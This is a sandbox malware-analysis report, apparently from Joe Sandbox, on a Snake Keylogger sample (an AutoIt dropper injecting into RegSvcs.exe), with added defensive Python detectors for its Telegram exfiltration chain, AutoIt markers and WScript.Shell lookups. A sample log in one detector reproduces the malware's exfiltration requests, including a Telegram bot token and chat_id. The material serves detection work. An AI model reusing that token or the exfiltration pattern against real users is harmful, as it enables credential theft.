                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_0031001C
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0033CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0033CABC
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_000ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 2_2_000ACABC
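The request chain the sandbox recorded above (a GET to checkip.dyndns.org with the legacy ".NET CLR1.0.3705" User-Agent, a GET to reallyfreegeoip.org/xml/<ip> for the country, then sendMessage or sendDocument calls to api.telegram.org) is what a SOC can hunt for in proxy logs. The following script is an added example written for this page; it is not code from the Joe Sandbox report or from the malware. It scores each client by how many stages of the chain it performed and extracts the bot token and chat_id from the Telegram URL. The tab-separated log schema (client, method, host, path, user-agent) and the sample log lines are constructed for the example; the User-Agent of the geoip and Telegram requests is not shown in the report and is written as "-".

```python
"""Added example, not part of the Joe Sandbox report or of the malware: flag the
Snake/VIP Keylogger exfiltration chain in HTTP proxy logs and pull the Telegram bot
token and chat_id out of the api.telegram.org requests.

Log schema is an assumption: one request per line, tab separated as
client_ip, method, host, path, user_agent. Adapt parse_line() to your proxy.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Observed in the report: the legacy .NET WebClient User-Agent sent to checkip.dyndns.org.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"

# Telegram Bot API path: /bot<token>/<method>. The token group is [^/]* on purpose so
# that the empty "/bot/sendMessage?chat_id=" seen in the report still matches.
TELEGRAM_RE = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>sendMessage|sendDocument)(?:\?|$)")
# Shape of a real bot token: numeric bot id, colon, 35-char secret (the report's token fits).
TOKEN_SHAPE = re.compile(r"^\d{8,12}:[A-Za-z0-9_-]{35}$")
CHAT_RE = re.compile(r"[?&]chat_id=(?P<chat>\d*)")

STAGES = ("ip_lookup", "geo_lookup", "telegram_exfil")


@dataclass
class Finding:
    stages: Set[str] = field(default_factory=set)
    # (method, token, chat_id, token_looks_valid) for every Telegram API call
    telegram: List[Tuple[str, str, str, bool]] = field(default_factory=list)

    @property
    def score(self) -> int:
        """0..3: how many stages of the chain this client has been seen performing."""
        return len(self.stages)


def parse_line(line: str) -> Optional[Tuple[str, str, str, str, str]]:
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 5:
        return None
    client, method, host, path, ua = parts
    return client, method.upper(), host.lower(), path, ua


def classify(host: str, path: str, ua: str) -> Optional[str]:
    """Map one request to a stage of the chain, or None if it is unrelated."""
    if host == "checkip.dyndns.org" and ua == LEGACY_UA:
        return "ip_lookup"
    if host == "reallyfreegeoip.org" and path.startswith("/xml/"):
        return "geo_lookup"
    if host == "api.telegram.org" and TELEGRAM_RE.match(path):
        return "telegram_exfil"
    return None


def analyse(lines) -> Dict[str, Finding]:
    """Group matching requests by client; a client seen at all three stages scores 3."""
    findings: Dict[str, Finding] = defaultdict(Finding)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        client, _method, host, path, ua = rec
        stage = classify(host, path, ua)
        if stage is None:
            continue
        finding = findings[client]
        finding.stages.add(stage)
        if stage == "telegram_exfil":
            m = TELEGRAM_RE.match(path)
            chat = CHAT_RE.search(path)
            token = m.group("token")
            finding.telegram.append((m.group("method"), token,
                                     chat.group("chat") if chat else "",
                                     TOKEN_SHAPE.match(token) is not None))
    return dict(findings)


# Constructed sample log modelled on the requests in this report (client 192.168.2.5
# runs the full chain; the other two lines are benign noise). The User-Agent on the
# geoip and Telegram requests is unknown from the report and is written as "-".
SAMPLE_LOG = [
    "192.168.2.5\tGET\tcheckip.dyndns.org\t/\t" + LEGACY_UA,
    "192.168.2.5\tGET\treallyfreegeoip.org\t/xml/8.46.123.189\t-",
    "192.168.2.5\tGET\tapi.telegram.org\t/bot/sendMessage?chat_id=&text=PC%20Name:376483\t-",
    "192.168.2.5\tPOST\tapi.telegram.org\t/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg"
    "/sendDocument?chat_id=1886630858&caption=Cookies\t-",
    "192.168.2.7\tGET\treallyfreegeoip.org\t/xml/\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0",
    "192.168.2.9\tGET\twww.example.com\t/index.html\tMozilla/5.0",
]


if __name__ == "__main__":
    for client, f in sorted(analyse(SAMPLE_LOG).items(), key=lambda kv: -kv[1].score):
        print(f"{client}: score {f.score}/3, stages {sorted(f.stages)}")
        for method, token, chat, ok in f.telegram:
            print(f"  telegram {method} chat_id={chat or '<empty>'} token={token or '<empty>'} "
                  f"{'(well-formed)' if ok else '(missing or malformed)'}")
```

The detector deliberately keeps a Telegram hit even when the token and chat_id are empty: the sendMessage requests in this report go to /bot/sendMessage?chat_id= with no token at all and are answered with HTTP 404, so requiring a well-formed token would miss exactly the misconfigured build that ran here. A client that only hits reallyfreegeoip.org scores 1 and should not page anyone on its own; the score only becomes actionable at 2 or 3, or when a well-formed token is present, which is also the value to hand to the takedown request.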

                System Summary

                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000003.00000002.4526688861.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 2804, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: This is a third-party compiled AutoIt script. 0_2_002B3B3A
                Source: 6BRa130JDj.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 6BRa130JDj.exe, 00000000.00000000.2056309027.0000000000364000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_9676f84d-e
                Source: 6BRa130JDj.exe, 00000000.00000000.2056309027.0000000000364000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_7449699a-a
                Source: 6BRa130JDj.exe, 00000000.00000003.2092314926.00000000033B3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c0984969-b
                Source: 6BRa130JDj.exe, 00000000.00000003.2092314926.00000000033B3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_a4f32389-2
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: This is a third-party compiled AutoIt script. 2_2_00023B3A
                Source: ectosphere.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: ectosphere.exe, 00000002.00000002.2131693043.00000000000D4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_76b2873c-1
                Source: ectosphere.exe, 00000002.00000002.2131693043.00000000000D4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_e93448e0-3
                Source: ectosphere.exe, 00000006.00000002.2290219880.00000000000D4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_219298c8-5
                Source: ectosphere.exe, 00000006.00000002.2290219880.00000000000D4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_18ec02c7-2
                Source: 6BRa130JDj.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_cdf203a7-1
                Source: 6BRa130JDj.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_0c6da13a-f
                Source: ectosphere.exe.0.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_03f4443e-2
                Source: ectosphere.exe.0.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_d0b79744-d
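Every occurrence of the marker string listed above comes from the AutoIt3 runtime stub that wraps the real payload, so the string alone is enough to classify both the submitted file and the dropped ectosphere.exe as compiled AutoIt. The Python below is an added example, not code from the report or from Joe Sandbox: it scans a byte buffer for the marker in ASCII and in UTF-16LE (a scan that only extracts ASCII strings can miss the Unicode build of the runtime) and for the AU3!EA06 signature that precedes the embedded compiled script, which is a widely documented AutoIt3 marker assumed here rather than taken from the report. The two sample buffers are constructed stand-ins, not the real binaries.

```python
import sys

# Marker string the report lists for both 6BRa130JDj.exe and ectosphere.exe;
# it belongs to the AutoIt3 runtime stub, not to the payload script.
AUTOIT_MARKER = b"This is a third-party compiled AutoIt script."
# Assumed secondary marker (not listed in this report): the well-known
# signature that precedes the embedded, compiled AutoIt3 script resource.
AU3_SCRIPT_MAGIC = b"AU3!EA06"


def find_all(data: bytes, needle: bytes) -> list:
    """Return every offset at which needle occurs in data."""
    offsets, start = [], 0
    while (idx := data.find(needle, start)) != -1:
        offsets.append(idx)
        start = idx + 1
    return offsets


def scan_autoit(data: bytes) -> dict:
    """Classify a byte buffer by the AutoIt markers it contains.

    The marker is searched both as ASCII and as UTF-16LE, since the AutoIt3
    runtime is a Unicode build and ASCII-only string extraction can miss it.
    The MZ check is reported separately so that a marker found in a memory
    dump (which has no PE header) is still surfaced.
    """
    ascii_hits = find_all(data, AUTOIT_MARKER)
    wide_hits = find_all(data, AUTOIT_MARKER.decode("ascii").encode("utf-16-le"))
    magic_hits = find_all(data, AU3_SCRIPT_MAGIC)
    found = bool(ascii_hits or wide_hits or magic_hits)
    return {
        "is_pe": data[:2] == b"MZ",
        "ascii_hits": ascii_hits,
        "wide_hits": wide_hits,
        "magic_hits": magic_hits,
        "verdict": "compiled-autoit" if found else "no-autoit-markers",
    }


def scan_file(path: str) -> dict:
    """Run scan_autoit over a file on disk (e.g. a dropped executable)."""
    with open(path, "rb") as fh:
        return scan_autoit(fh.read())


# Constructed test buffers (not the real samples): a fake PE carrying the
# wide-string marker plus the script magic, and a fake PE without either.
SAMPLE_AUTOIT = (
    b"MZ" + b"\x90" * 62 + b"\x00" * 16
    + AUTOIT_MARKER.decode("ascii").encode("utf-16-le")
    + b"\x00" * 8 + AU3_SCRIPT_MAGIC + b"\x01\x02\x03"
)
SAMPLE_CLEAN = b"MZ" + b"\x90" * 64 + b"Hello, world.\x00"

if __name__ == "__main__":
    paths = sys.argv[1:]
    results = ([scan_file(p) for p in paths] if paths
               else [scan_autoit(SAMPLE_AUTOIT), scan_autoit(SAMPLE_CLEAN)])
    for r in results:
        print(r["verdict"], "ascii:", r["ascii_hits"],
              "utf16:", r["wide_hits"], "au3:", r["magic_hits"])
```

Run it with one or more file paths to scan real files; with no arguments it scans the two constructed buffers. The offsets it returns are file offsets, which is what you need to carve the embedded script for further analysis.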
                Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
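The line above records wscript.exe resolving the Windows Script Host Shell Object (CLSID {72C24DD5-D70A-438B-8A42-98424B88AFB8}), the COM class a dropper script uses to launch a second stage. The Python below is an added example, not from the report or from Joe Sandbox: it evaluates a simple rule over constructed registry-query events (process image plus queried key) and flags script hosts that resolve that class. Matching the ProgID path Classes\WScript.Shell as well is an assumption of the example, not something the report lists. Any script that calls CreateObject("WScript.Shell") produces the same registry query, so treat a hit as a triage signal and check the script path and parent process before acting on it.

```python
import ntpath

# CLSID of the Windows Script Host Shell Object, as recorded in the report line above.
WSH_SHELL_CLSID = "{72C24DD5-D70A-438B-8A42-98424B88AFB8}"
# Assumed: the ProgID under which the same class is registered (not listed in the report).
WSH_SHELL_PROGID = "WScript.Shell"
# Script hosts whose COM lookups this rule cares about.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def is_wsh_shell_query(event: dict) -> bool:
    """True when a script host resolves WScript.Shell through the registry.

    Matching is case-insensitive on both the image name and the key, since
    registry paths are case-insensitive and telemetry sources differ in case.
    """
    image = ntpath.basename(event["image"]).lower()
    if image not in SCRIPT_HOSTS:
        return False
    key = event["key"].upper()
    if "\\CLASSES\\" not in key:
        return False
    progid_path = "\\CLASSES\\" + WSH_SHELL_PROGID.upper()
    return (WSH_SHELL_CLSID in key) or (progid_path in key)


def triage(events: list) -> list:
    """Return (index, image, key) for every event the rule flags."""
    return [(i, e["image"], e["key"])
            for i, e in enumerate(events) if is_wsh_shell_query(e)]


# Constructed registry-query events; the first is modelled on the report line
# above, the rest are controls (wrong process, ProgID form, unrelated class).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"},
    {"image": r"C:\Windows\explorer.exe",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"},
    {"image": r"C:\Windows\SysWOW64\cscript.exe",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WScript.Shell\CLSID"},
    # Placeholder CLSID (all zeros) standing in for any unrelated class.
    {"image": r"C:\Windows\System32\wscript.exe",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    for idx, image, key in triage(SAMPLE_EVENTS):
        print(f"[{idx}] {image} -> {key}")
```

In production telemetry the event dicts would come from registry-access logging (Sysmon event ID 12/13 or an EDR feed); the rule itself does not change, only the field names you map into "image" and "key".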
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_0031A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_00308310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_003151BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_000851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002BE6A0
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002DD975
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002BFCE0
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002D21C5
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002E62D2
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_003303DA
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002E242E
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002D25FA
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_0030E616
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002C66E1
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002E878F
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002C8808
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_00330857
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002E6844
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_00318889
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002DCB21
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002E6DB6
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002C6F9E
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002C3030
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002D3187
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002DF1D9
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002B1287
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002D1484
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002C5520
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002D7696
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002C5760
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002D1978
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002E9AB5
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002DBDA6
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002D1D90
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_00337DDB
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002BDF00
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002C3FE0
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_0116BF88
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0002E6A0
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0004D975
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0002FCE0
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_000421C5
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_000562D2
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_000A03DA
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0005242E
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_000425FA
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0007E616
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_000366E1
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0005878F
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00038808
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00056844
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_000A0857
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00088889
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0004CB21
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00056DB6
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00036F9E
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00033030
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00043187
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0004F1D9
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00021287
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00041484
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00035520
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00047696
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00035760
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00041978
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00059AB5
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00041D90
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0004BDA6
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_000A7DDB
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0002DF00
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00033FE0
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00F6E600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01247118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124C147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124A088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01245362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124C468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01246498
